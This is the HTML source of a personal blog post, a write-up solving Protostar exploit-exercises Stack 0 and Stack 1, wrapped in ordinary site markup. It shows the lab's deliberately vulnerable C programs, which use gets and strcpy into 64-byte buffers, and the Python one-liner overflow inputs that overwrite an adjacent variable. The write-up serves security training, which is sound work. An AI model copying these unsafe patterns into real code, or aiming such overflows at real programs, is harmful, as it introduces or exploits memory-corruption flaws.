pew
/
paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
paulwalko.github.io/_site/writeup/nebula_exploit_exercises.html

272 lines
10 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-1</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="http://localhost:4000/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="http://localhost:4000/category">CATEGORY</a></li>
<li><a href="http://localhost:4000/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> exploit-exercises</li>
<li><i class="fa fa-tag"></i> protostar</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 14 Jun 2016 under category <a href="http://localhost:4000/category/">writeup</a></p>
</header>
<h1 id="stack-0">Stack 0</h1>
<p>Heres what were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
</code></pre>
</div>
<p>The first thing I took note of is the size of the <code class="highlighter-rouge">buffer</code>: 64 bytes. After that, the program inputs text for <code class="highlighter-rouge">buffer</code>, and then checks to see if you modified the <code class="highlighter-rouge">modified</code> variable.
Im guessing if I put in a string longer than 64 bytes it will work. Lets see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>That works as expected, now with 65 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Heres the code were given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Just like Stack 0, were given a <code class="highlighter-rouge">buffer</code> array size 64 bytes and were also asked to input the contents of it. Except it looks like modified has to equal <code class="highlighter-rouge">0x61626364</code> instead of just changing it like before.</p>
<p>Keep in mind this is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so Ill input the value in reverse order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That works as expected, now with the additional bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
<script type="text/javascript" src="http://localhost:4000/javascripts/markdownreader.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink